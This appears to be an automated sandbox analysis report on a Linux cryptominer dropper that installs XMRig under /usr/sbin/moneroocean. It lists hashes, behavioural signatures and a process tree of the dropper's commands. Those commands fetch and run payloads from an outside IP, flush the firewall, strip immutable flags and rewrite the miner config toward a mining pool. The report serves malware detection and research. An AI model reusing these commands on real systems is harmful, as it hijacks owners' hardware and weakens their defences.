Analysis
max time kernel: 15s
max time network: 150s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240226-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240226-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 10/04/2024, 13:08
Behavioral tasks
- behavioral1: sample a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa, resource ubuntu1804-amd64-20240226-en
- behavioral2: sample a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa, resource debian9-armhf-20240226-en
- behavioral3: sample a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa, resource debian9-mipsbe-20240226-en
- behavioral4: sample a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa, resource debian9-mipsel-20240226-en
General
Target: a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa
Size: 34KB
MD5: 54130adf66d5bfa4e4b9f04b3933e493
SHA1: 1c5f5986b92e3392d4cfaa531c88cd06b5cfd361
SHA256: a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa
SHA512: dc9a8b01fc16686fed8d82a89147cd614a8c6f5a20aa324fd8922cca0a0aa3bf03c2d1407bd5028789864b1a429a31b2bf904a07101bca9d5c76488ec69da82d
SSDEEP: 768:dBxlT2wDGWvWCrESA+FylT4hxXpGdKI3oB6kX7sdrCIZMfXxK2eJ5tLW:YDSA+Fyl1dRoZ7q9W
Malware Config
Signatures
- XMRig Miner payload (2 IoCs)
  YARA rule matches: behavioral1/files/fstream-6.dat matched family_xmrig; behavioral1/files/fstream-6.dat matched xmrig
- Modifies the dynamic linker configuration file (1 TTP, 1 IoC)
  Malware can modify the configuration file of the dynamic linker to preload malicious libraries into every executed process.
  File opened for modification: /etc/ld.so.preload (process a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa)
- Adds new SSH keys (2 IoCs)
  Linux special file that holds SSH keys. The threat actor may add new keys for further remote access.
  Files opened for modification: /root/.ssh/authorized_keys (process a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa); /root/.ssh/authorized_keys2 (process not found)
- Executes dropped EXE (2 IoCs)
  /.dockerenv (pid 1596, process .dockerenv); /usr/sbin/moneroocean/xmrig (pid 1642, process xmrig)
- Flushes firewall rules (1 IoC)
  Flushes/disables firewall rules inside the Linux kernel.
  pid 1578 (process iptables)
- Writes DNS configuration (1 TTP, 1 IoC)
  Writes data to the DNS resolver config file.
  File opened for modification: /etc/resolv.conf (process a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa)
- Attempts to change immutable files (13 IoCs)
  Modifies inode attributes on the filesystem to allow changing of immutable files.
  chattr: pids 1581, 1582, 1586, 1726; sed: pids 1632, 1641, 1648, 1649, 1650, 1651, 1652, 1653, 1655
- Checks CPU configuration (1 TTP, 1 IoC)
  Checks CPU information that indicates whether the system is a virtual machine.
  File opened for reading: /proc/cpuinfo (process xmrig)
- Checks hardware identifiers (DMI) (1 TTP, 4 IoCs)
  Checks DMI information that indicates whether the system is a virtual machine.
  Files opened for reading by xmrig, under /sys/devices/virtual/dmi/id/: product_name, board_vendor, bios_vendor, sys_vendor
- Enumerates running processes
  Discovers information about currently running processes on the system.
- Reads CPU attributes (1 TTP, 5 IoCs)
  Files opened for reading: /sys/devices/system/cpu/online (xmrig), /sys/devices/system/cpu/types (xmrig), /sys/devices/system/cpu/possible (xmrig), /sys/devices/system/cpu/online (ps), /sys/devices/system/cpu/online (ps)
- Reads hardware information (1 TTP, 14 IoCs)
  Accesses system info such as serial numbers and manufacturer names.
  Files opened for reading by xmrig, under /sys/devices/virtual/dmi/id/: board_name, board_version, board_asset_tag, chassis_serial, chassis_asset_tag, chassis_vendor, bios_version, product_version, board_serial, chassis_type, chassis_version, product_serial, product_uuid, bios_date
- Write file to user bin folder (1 TTP, 13 IoCs)
  Files opened for modification: /usr/sbin/moneroocean/sedDEEjVH (sed), /usr/sbin/moneroocean/miner.sh (process not found), /usr/sbin/moneroocean/SHA256SUMS (tar), /usr/sbin/moneroocean/sedueGpaF (sed), /usr/sbin/moneroocean/sedieQq3G (sed), /usr/sbin/moneroocean/sedKBtDsL (sed), /usr/sbin/moneroocean/sedO5wYYN (sed), /usr/sbin/moneroocean/config.json (tar), /usr/sbin/moneroocean/xmrig (tar), /usr/sbin/moneroocean/sedqjJP2A (sed), /usr/sbin/moneroocean/sedQd0ofI (sed), /usr/sbin/moneroocean/config_background.json (cp), /usr/sbin/.bash_history (touch)
- Enumerates kernel/hardware configuration (1 TTP, 54 IoCs)
  Reads contents of the /sys virtual filesystem to enumerate system information. All 54 files were opened for reading by xmrig:
  under /sys/bus/cpu/devices/cpu0/cache/: index0/size, index0/physical_line_partition, index0/coherency_line_size, index0/shared_cpu_map, index0/level, index0/type, index0/number_of_sets, index1/shared_cpu_map, index1/level, index1/type, index2/level, index2/coherency_line_size, index2/physical_line_partition, index2/type, index2/number_of_sets, index2/shared_cpu_map, index2/size, index3/size, index3/shared_cpu_map, index3/physical_line_partition, index3/type, index3/level, index3/number_of_sets, index3/coherency_line_size, index4/shared_cpu_map, index5/shared_cpu_map, index6/shared_cpu_map, index7/shared_cpu_map, index8/shared_cpu_map, index9/shared_cpu_map
  under /sys/bus/cpu/devices/cpu0/topology/: core_id, core_siblings, die_cpus, thread_siblings, physical_package_id
  under /sys/bus/cpu/devices/cpu0/cpufreq/: cpuinfo_max_freq, base_frequency
  /sys/bus/cpu/devices
  under /sys/bus/node/devices/node0/: access0/initiators, access0/initiators/read_latency, access0/initiators/read_bandwidth, access1/initiators, cpumap, meminfo, hugepages, hugepages/hugepages-2048kB/nr_hugepages
  /sys/fs/cgroup/cpuset/cpuset.cpus, /sys/fs/cgroup/cpuset/cpuset.mems, /sys/fs/cgroup/unified/cgroup.controllers
  /sys/kernel/mm/hugepages, /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages
  /sys/bus/dax/devices, /sys/devices/virtual/dmi/id, /sys/devices/system/node/online
- Reads runtime system information (64 IoCs)
  Reads data from the /proc virtual filesystem. Files opened for reading, grouped by process:
  ps: /proc/32/status, /proc/32/cmdline, /proc/1164/cmdline, /proc/7/stat, /proc/1326/cmdline, /proc/947/status, /proc/27/status, /proc/168/stat, /proc/30/cmdline, /proc/1567/cmdline, /proc/20/stat, /proc/1250/status, /proc/1287/status, /proc/963/cmdline, /proc/1037/cmdline, /proc/1307/cmdline, /proc/13/status, /proc/628/status, /proc/1180/cmdline, /proc/89/cmdline, /proc/508/cmdline, /proc/156/stat, /proc/1558/cmdline, /proc/1563/cmdline, /proc/1250/stat, /proc/629/stat, /proc/480/status, /proc/10/stat, /proc/587/cmdline, /proc/1248/status, /proc/468/status, /proc/1178/cmdline, /proc/1147/stat, /proc/510/status, /proc/1150/cmdline
  pidof: /proc/1232/stat, /proc/462/stat, /proc/1189/cmdline, /proc/1134/cmdline, /proc/154/stat, /proc/485/stat, /proc/959/cmdline, /proc/9/stat, /proc/483/stat, /proc/1353/stat, /proc/98/stat, /proc/1180/stat
  killall: /proc/508/stat, /proc/948/stat, /proc/535/stat, /proc/1084/cmdline, /proc/1181/stat, /proc/25/stat, /proc/82/stat, /proc/80/stat, /proc/1666/stat, /proc/4/stat, /proc/35/stat, /proc/647/stat, /proc/342/stat, /proc/1144/cmdline, /proc/468/stat
  sed: /proc/filesystems
  systemctl: /proc/self/stat
- Writes file to tmp directory (3 IoCs)
  Malware often drops required files in the /tmp directory.
  Files opened for modification: /tmp/sh-thd.0BAlgU, /tmp/sh-thd.FTjPeN, /tmp/moneroocean_miner.service
Processes (each entry is "path (PID): command line"; indentation shows the parent/child relationship, and a "signatures:" line lists the signatures that process triggered)
- /tmp/a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa (PID 1560): /tmp/a4000315471cf197c0552aeec0e7afbe0a935b86ff9afe5b1443812d3f7185fa
  signatures: Modifies the dynamic linker configuration file; Adds new SSH keys; Writes DNS configuration
  - /bin/hostname (PID 1561): hostname
  - /bin/pidof (PID 1562): pidof /usr/bin/systemd
    signatures: Reads runtime system information
  - /bin/grep (PID 1564): grep -i "[a]liyun"
  - /bin/ps (PID 1563): ps aux
    signatures: Reads CPU attributes; Reads runtime system information
  - /bin/grep (PID 1567): grep -i "[y]unjing"
  - /bin/ps (PID 1566): ps aux
    signatures: Reads CPU attributes; Reads runtime system information
  - /bin/uname (PID 1571): uname -m
  - /bin/uname (PID 1572): uname -m
  - /bin/uname (PID 1573): uname -m
  - /bin/uname (PID 1574): uname -m
  - /bin/uname (PID 1575): uname -m
  - /bin/uname (PID 1576): uname -m
  - /bin/uname (PID 1577): uname -m
  - /sbin/iptables (PID 1578): iptables -F
    signatures: Flushes firewall rules
  - /usr/bin/chattr (PID 1581): chattr -ia /etc/resolv.conf
    signatures: Attempts to change immutable files
  - /usr/bin/chattr (PID 1582): chattr +i /etc/resolv.conf
    signatures: Attempts to change immutable files
  - /usr/bin/curl (PID 1583): curl -sLk http://chimaera.cc/data/xmrig/wallet.rotate.suckers.txt
  - /bin/uname (PID 1585): uname -m
  - /usr/bin/chattr (PID 1586): chattr -ia / /tmp/ /var/ /var/tmp/
    signatures: Attempts to change immutable files
  - /bin/chmod (PID 1587): chmod 1777 /tmp/ /var/ /var/tmp/
  - /bin/mount (PID 1591): mount -o "rw,remount" /
  - /bin/rm (PID 1592): rm -f /.dockerenv
  - /usr/bin/wget (PID 1593): wget -q http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/.../xmr/x86_64 -O /.dockerenv
  - /bin/chmod (PID 1594): chmod 755 /.dockerenv
  - /bin/mount (PID 1595): mount -o "remount,exec" /
  - /.dockerenv (PID 1596): /.dockerenv
    signatures: Executes dropped EXE
  - /usr/bin/nproc (PID 1598): nproc
  - /bin/sleep (PID 1602): sleep 2
  - /usr/bin/sudo (PID 1621): sudo -n true
    - /bin/true (PID 1622): true
  - /usr/bin/sudo (PID 1623): sudo systemctl stop moneroocean_miner.service
    - /bin/systemctl (PID 1624): systemctl stop moneroocean_miner.service
  - /usr/bin/killall (PID 1625): killall -9 xmrig
    signatures: Reads runtime system information
  - /bin/rm (PID 1626): rm -rf /usr/sbin/moneroocean
  - /usr/bin/curl (PID 1627): curl -Lk --progress-bar http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/.../xmr/x86_64.tar.gz -o /var/tmp/xmrig.tar.gz
  - /bin/mkdir (PID 1628): mkdir /usr/sbin/moneroocean
  - /bin/tar (PID 1629): tar xf /var/tmp/xmrig.tar.gz -C /usr/sbin/moneroocean
    - /usr/local/sbin/gzip (PID 1630): gzip -d
    - /usr/local/bin/gzip (PID 1630): gzip -d
    - /usr/sbin/gzip (PID 1630): gzip -d
    - /usr/bin/gzip (PID 1630): gzip -d
    - /sbin/gzip (PID 1630): gzip -d
    - /bin/gzip (PID 1630): gzip -d
  - /bin/rm (PID 1631): rm /var/tmp/xmrig.tar.gz
  - /bin/sed (PID 1632): sed -i "s/\"donate-level\": *[^,]*,/\"donate-level\": 1,/" /usr/sbin/moneroocean/config.json
    signatures: Attempts to change immutable files
  - /usr/sbin/moneroocean/xmrig (PID 1633): /usr/sbin/moneroocean/xmrig --help
  - /usr/bin/curl (PID 1635): curl -Lk --progress-bar https://github.com/xmrig/xmrig/releases/download/v6.13.1/xmrig-6.13.1-linux-static-x64.tar.gz -o /var/tmp/xmrig.tar.gz
  - /bin/tar (PID 1638): tar xf /var/tmp/xmrig.tar.gz -C /usr/sbin/moneroocean "--strip=1"
    signatures: Write file to user bin folder
    - /usr/local/sbin/gzip (PID 1639): gzip -d
    - /usr/local/bin/gzip (PID 1639): gzip -d
    - /usr/sbin/gzip (PID 1639): gzip -d
    - /usr/bin/gzip (PID 1639): gzip -d
    - /sbin/gzip (PID 1639): gzip -d
    - /bin/gzip (PID 1639): gzip -d
  - /bin/rm (PID 1640): rm /var/tmp/xmrig.tar.gz
  - /bin/sed (PID 1641): sed -i "s/\"donate-level\": *[^,]*,/\"donate-level\": 0,/" /usr/sbin/moneroocean/config.json
    signatures: Attempts to change immutable files; Write file to user bin folder
  - /usr/sbin/moneroocean/xmrig (PID 1642): /usr/sbin/moneroocean/xmrig --help
    signatures: Executes dropped EXE; Checks CPU configuration; Checks hardware identifiers (DMI); Reads CPU attributes; Reads hardware information; Enumerates kernel/hardware configuration
  - /bin/sed (PID 1648): sed -i "s/\"url\": *\"[^\"]*\",/\"url\": \"94.130.12.30:3333\",/" /usr/sbin/moneroocean/config.json
    signatures: Attempts to change immutable files; Write file to user bin folder
  - /bin/sed (PID 1649), command line as recorded by the sandbox (the "user" value it injects is the Cloudflare challenge page returned for the wallet fetch above):
/bin/sedsed -i "s/\"user\": *\"[^\"]*\",/\"user\": \"<!DOCTYPE" "html><html" "lang=\"en-US\"><head><title>Just" a "moment...</title><meta" "http-equiv=\"Content-Type\"" "content=\"text/html;" "charset=UTF-8\"><meta" "http-equiv=\"X-UA-Compatible\"" "content=\"IE=Edge\"><meta" "name=\"robots\"" "content=\"noindex,nofollow\"><meta" "name=\"viewport\"" "content=\"width=device-width,initial-scale=1\"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131}button,html{font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe" "UI,Roboto,Helvetica" "Neue,Arial,Noto" "Sans,sans-serif,Apple" Color "Emoji,Segoe" UI "Emoji,Segoe" UI "Symbol,Noto" Color "Emoji}@media" "(prefers-color-scheme:dark){body{background-color:#222;color:#d9d9d9}body" "a{color:#fff}body" "a:hover{color:#ee730a;text-decoration:underline}body" .lds-ring "div{border-color:#999" transparent "transparent}body" ".font-red{color:#b20f03}body" ".big-button,body" ".pow-button{background-color:#4693ff;color:#1d1d1d}body" "#challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body" "#challenge-error-text{background-image:url(data:image/svg+xml;base64,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)}}body{display:flex;flex-direction:column;min-height:100vh}body.no-js" ".loading-spinner{visibility:hidden}body.no-js" ".challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark" "a{color:#fff}body.dark" "a:hover{color:#ee730a;text-decoration:underline}body.dark" .lds-ring "div{border-color:#999" 
transparent "transparent}body.dark" ".font-red{color:#b20f03}body.dark" ".big-button,body.dark" ".pow-button{background-color:#4693ff;color:#1d1d1d}body.dark" "#challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark" "#challenge-error-text{background-image:url(data:image/svg+xml;base64,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)}body.light{background-color:transparent;color:#313131}body.light" "a{color:#0051c3}body.light" "a:hover{color:#ee730a;text-decoration:underline}body.light" .lds-ring "div{border-color:#595959" transparent "transparent}body.light" ".font-red{color:#fc574a}body.light" ".big-button,body.light" ".pow-button{background-color:#003681;border-color:#003681;color:#fff}body.light" "#challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.light" "#challenge-error-text{background-image:url(data:image/svg+xml;base64,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)}a{background-color:transparent;color:#0051c3;text-decoration:none;transition:color" .15s "ease}a:hover{color:#ee730a;text-decoration:underline}.main-content{margin:8rem" 
"auto;max-width:60rem;width:100%}.heading-favicon{height:2rem;margin-right:.5rem;width:2rem}@media" "(width" "<=" "720px){.main-content{margin-top:4rem}.heading-favicon{height:1.5rem;width:1.5rem}}.footer,.main-content{padding-left:1.5rem;padding-right:1.5rem}.main-wrapper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem" "0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.core-msg{font-weight:400}.body-text{font-size:1rem;line-height:1.25rem}@media" "(width" "<=" "720px){.h1{font-size:1.5rem;line-height:1.75rem}.h2{font-size:1.25rem}.core-msg,.h2{line-height:1.5rem}.core-msg{font-size:1rem}}#challenge-error-text{background-image:url(data:image/svg+xml;base64,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);padding-left:34px}#challenge-error-text,#challenge-success-text{background-repeat:no-repeat;background-size:contain}#challenge-success-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=);padding-left:42px}.text-center{text-align:center}.big-button{border:.063rem" solid "#0051c3;border-radius:.313rem;font-size:.875rem;line-height:1.313rem;padding:.375rem" "1rem;transition-duration:.2s;transition-property:background-color,border-color,color;transition-timing-function:ease}.big-button:hover{cursor:pointer}.captcha-prompt:not(.hidden){display:flex}@media" "(width" "<=" "720px){.captcha-prompt:not(.hidden){flex-wrap:wrap;justify-content:center}}.pow-button{background-color:#0051c3;color:#fff;margin:2rem" 
"0}.pow-button:hover{background-color:#003681;border-color:#003681;color:#fff}.footer{font-size:.75rem;line-height:1.125rem;margin:0" "auto;max-width:60rem;width:100%}.footer-inner{border-top:1px" solid "#d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:\"\";display:table}.clearfix" ".column{float:left;padding-right:1.5rem;width:50%}.diagnostic-wrapper{margin-bottom:.5rem}.footer" ".ray-id{text-align:center}.footer" .ray-id "code{font-family:monaco,courier,monospace}.core-msg,.zone-name-title{overflow-wrap:break-word}@media" "(width" "<=" "720px){.diagnostic-wrapper{display:flex;flex-wrap:wrap;justify-content:center}.clearfix:after{clear:none;content:none;display:initial;text-align:center}.column{padding-bottom:2rem}.clearfix" ".column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring" "div{height:1.875rem;width:1.875rem}.lds-ring" "div{animation:lds-ring" 1.2s "cubic-bezier(.5,0,.5,1)" "infinite;border:.3rem" solid "transparent;border-radius:50%;border-top-color:#313131;box-sizing:border-box;display:block;position:absolute}.lds-ring" "div:first-child{animation-delay:-.45s}.lds-ring" "div:nth-child(2){animation-delay:-.3s}.lds-ring" "div:nth-child(3){animation-delay:-.15s}@keyframes" "lds-ring{0%{transform:rotate(0)}to{transform:rotate(1turn)}}@media" screen and "(-ms-high-contrast:active),screen" and "(-ms-high-contrast:none){.main-wrapper,body{display:block}}</style><meta" "http-equiv=\"refresh\"" "content=\"375\"></head><body" "class=\"no-js\"><div" "class=\"main-wrapper\"" "role=\"main\"><div" "class=\"main-content\"><noscript><div" "id=\"challenge-error-title\"><div" "class=\"h2\"><span" "id=\"challenge-error-text\">Enable" JavaScript and cookies to "continue</span></div></div></noscript></div></div><script>(function(){window._cf_chl_opt={cvId:" "'3',cZone:" "\"chimaera.cc\",cType:" 
"'managed',cNounce:" "'26652',cRay:" "'8722f6cc78d89491',cHash:" "'ed8deb8e2ce57dc',cUPMDTk:" "\"\\/data\\/xmrig\\/wallet.rotate.suckers.txt?__cf_chl_tk=k38ILQ0z6q6yaYLzJs0AJdeQAB5nAQTVRCHaI6K9FVE-1712754490-0.0.1.1-1599\",cFPWv:" "'b',cTTimeMs:" "'1000',cMTimeMs:" "'375000',cTplV:" "5,cTplB:" "'cf',cK:" "\"visitor-time\",fa:" "\"\\/data\\/xmrig\\/wallet.rotate.suckers.txt?__cf_chl_f_tk=k38ILQ0z6q6yaYLzJs0AJdeQAB5nAQTVRCHaI6K9FVE-1712754490-0.0.1.1-1599\",md:" "\"S3Dr0L_ebZi0aSsICpbe1T0.vyF5TJHwvn3argzKcJg-1712754490-1.1.1.1-R9mDWaClCPyb4yt0.oWdYCKrPRWt9SBIk27rwQt9qs2DArCITV.IWNaCPuOgvBb4ye5.bsrbZWS70l9jzhwQ0oWwgByGWi6I7TTq_7J6E7..ZOD4jqGF85gWVyKQX.T_i5AghMdhQDQKEqBQXD0BPjRoL9VJlJFwKWnyxd.R7.g71hhMMx6qKsj.1870FneiLPlg0F0kWROji8UOoE1Swx.WcFPF0kQXMzFvFdBLrHjBKlnZNmmrHxCygpHCckhwohJvUlJuCXpUW7vICEQJyafeBY0AaA8JW9zaoXgzatg3U4dZO3p91r2TJ8pZQm8n2KrIQvgOg7UVSqbS70rOxL_E14gjHUoHMa14HGQs2dhOspIHcWLi4ziwJ0rSIrc8987xpRgPFaTa8kUzH7SQcZzNVEUhf2CTqEjBbheU3XArhdBv55m9qwJ_bzFTGoi7SmwRH9fGbXMIR7ARrXYGS9TJU7S9KKc6kbKGHnxh8Nf7xjZzIOwEwExpkYzXYxdV1RCJJfdXB1LocWCzR..CHlOeElkiMYErYOhlJgagS2nHpW7mdw2hOeVN.iOJq977QFEl8QLZCEd.TklCJYIf78_s0pfdhXwrUDK6SfHM7fgMot__abK_1rvT..49GG7OYw0wLqWcyHiIMEHnUVDBIUR50voHwM3br9Xyi__Zws0kZZuPAWxO.TMuA500iO2ZB_f1._aM8uz7NfW2Q2KwPJ8QVq_o4eXW_.3BgVHq_CX3eop_pUKUDVoEggSLZHeVXAOyU_MVDVx6_nAbNa_642PmjnEI3EL.aq32JPQ0Uenz16XsZhCeqEyfpBKc6QOFBnG9McreBNp4yMD9c4IdHx2XhoYIpWD2qIOk7fU0hHheLLVAYC6tsKEDdTlzaBuCoBouxKsXXLTfgTU2C2cU3gplXWVXDYz_8EUyy7pFtAMO0oTXVhQjN3wJMjNBETiex4noOqScDRf42GLmp1ILW82UWZlI2xdUdNtNZ3705hxjeJhSIlslmOr1J0iojTT2IuFPDm64CPmGSD15m5NxY09AUfOi26OYnMO8LEeRCLbhjrqr0lRzT8BxdQxJ2BQH2ez8U87uj7dQPmm0AuklXClKR2N8Yx.q685h_Wa36qnbVsiNpt7XpMkGbHyJYzgh.qTNeWCcPll6apSfZKmYeRN.IYCtJDOiPepitW9v97vyMO3CyBtvGf1FOufN25gtO.2NdEe0JYhi_1NrbcXPGWVKbl3bX4FB1cLpFvl4QXxDxd9QYWhEdCfU_0VYE7aEIVHpuIwaxp12AcKlpiWbwkX7OIuHidl6cgSqVDtpRJZHFx1kKDajq8ilGDo852wq2Mvnd59G79PT6vX2aBKg3aglrltLSq5DkjfgXRvWV0fqvPDEDtTTSHUBXkPNN4xdJhaWgAcf9xdOxUv1yUbaNgIp0drQW75YXE49gG0kvmg_dvQFf..Rn.qgm19e8
jtSo9ahTu3VGV4TPJQ1YpqZRAnJpnBpkIf1lwWCwgmYke2np2BLnk_h05603e8h3Qje\",mdrd:" "\"tiNCykVmUlx6BNyrTzqPyC2HtGoXrYt4E3qQu4k_muY-1712754490-1.1.1.1-jW.Q0fKQDHf8ZuJaSNN1EdD3HPQp3Ho8XXfjJwGGWHng2P_m2s4gyKMYs08jV6DTcA_25HjJwQFJi7MrYWYIQR1s8pBXy2kkPMgfwNZk22OPrcMdh9f4U33hw0ZLCAw3S_hkx5qD1TflYroeH8tkVvXbP_SmyhwmtbuHVUDOreLGlUVcrEI2r4fXVThfSYAVkXZcdGuMwo8HghhWsuEkwl1wjEQR_DQY2RCP1buYhpNJx.C.je6VuVFntPqnNS.kqXdmmbCmfa_OjTorC97QcoMsbdNkGsjsB5Q.s4T51O0cThrmVH_Eal0sDT4PJhRyPSr0gJgyb5vJepeXEYFg4xwvVPLvO8z8FFO19qVaPQapPDNi8gQXV3UMdNgNxnlAtHq7qUlVZzQBjqQDoJxvb1c1Pf1SQacHpCMBLBHam7p5Q9veY6cxEOriQdkLjqXkkFwHzTZ.1gJZhxtxsJ5cDkFgCMZnpZ9tPITyJfNXCE5buynSR5XaDRGlJ0eHo_gqSmKHhBzIMGaopUY9he8VHg\",cRq:" "{ru:" "'aHR0cDovL2NoaW1hZXJhLmNjL2RhdGEveG1yaWcvd2FsbGV0LnJvdGF0ZS5zdWNrZXJzLnR4dA==',ra:" "'Y3VybC83LjU4LjA=',rm:" "'R0VU',d:" "'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',t:" "'MTcxMjc1NDQ5MC4zMjUwMDA=',cT:" "Math.floor(Date.now()" / "1000),m:" "'VpgChHdv/V/IRtaWAyWuH1eA7SUEQHnts4fvykLiDjQ=',i1:" "'S/IxqJxjZ0XtKbgVgCOHow==',i2:" "'IWNZzus4DcY/jsQb4w+bjQ==',zh:" "'BE3yDcBJfISHS68G5yvzzMRy5hSN+SzSUcAzErYYXY4=',uh:" "'3eCW9wmHFxRdeO8XVCuzIxmX/hZFk4VAcqHhoWaSI4Q=',hh:" "'Tg7bwaAfwqyBlelbU/iswxId9ucV5mZDRctkcf04SJ0=',}};var" cpo "=" "document.createElement('script');cpo.src" "=" "'/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8722f6cc78d89491';window._cf_chl_opt.cOgUHash" "=" location.hash "===" "''" "&&" "location.href.indexOf('#')" "!==" -1 "?" "'#'" : "location.hash;window._cf_chl_opt.cOgUQuery" "=" location.search "===" "''" "&&" "location.href.slice(0," location.href.length - "window._cf_chl_opt.cOgUHash.length).indexOf('?')" "!==" -1 "?" 
"'?'" : "location.search;if" "(window.history" "&&" "window.history.replaceState)" "{var" ogU "=" location.pathname + window._cf_chl_opt.cOgUQuery + "window._cf_chl_opt.cOgUHash;history.replaceState(null," "null," "\"\\/data\\/xmrig\\/wallet.rotate.suckers.txt?__cf_chl_rt_tk=k38ILQ0z6q6yaYLzJs0AJdeQAB5nAQTVRCHaI6K9FVE-1712754490-0.0.1.1-1599\"" + "window._cf_chl_opt.cOgUHash);cpo.onload" "=" "function()" "{history.replaceState(null," "null," "ogU);}}document.getElementsByTagName('head')[0].appendChild(cpo);}());</script></body></html>\",/" /usr/sbin/moneroocean/config.json2⤵
    signatures: Attempts to change immutable files
  - /bin/sed (PID 1650): sed -i "s/\"pass\": *\"[^\"]*\",/\"pass\": \"ubuntu1804-amd64-20240226-en-9\",/" /usr/sbin/moneroocean/config.json
    signatures: Attempts to change immutable files; Write file to user bin folder
  - /bin/sed (PID 1651): sed -i "s/\"max-cpu-usage\": *[^,]*,/\"max-cpu-usage\": 100,/" /usr/sbin/moneroocean/config.json
    signatures: Attempts to change immutable files; Write file to user bin folder
  - /bin/sed (PID 1652): sed -i "s#\"log-file\": *null,#\"log-file\": \"/usr/sbin/moneroocean/xmrig.log\",#" /usr/sbin/moneroocean/config.json
    signatures: Attempts to change immutable files; Write file to user bin folder
  - /bin/sed (PID 1653): sed -i "s/\"syslog\": *[^,]*,/\"syslog\": true,/" /usr/sbin/moneroocean/config.json
    signatures: Attempts to change immutable files; Write file to user bin folder; Reads runtime system information
  - /bin/cp (PID 1654): cp /usr/sbin/moneroocean/config.json /usr/sbin/moneroocean/config_background.json
    signatures: Write file to user bin folder
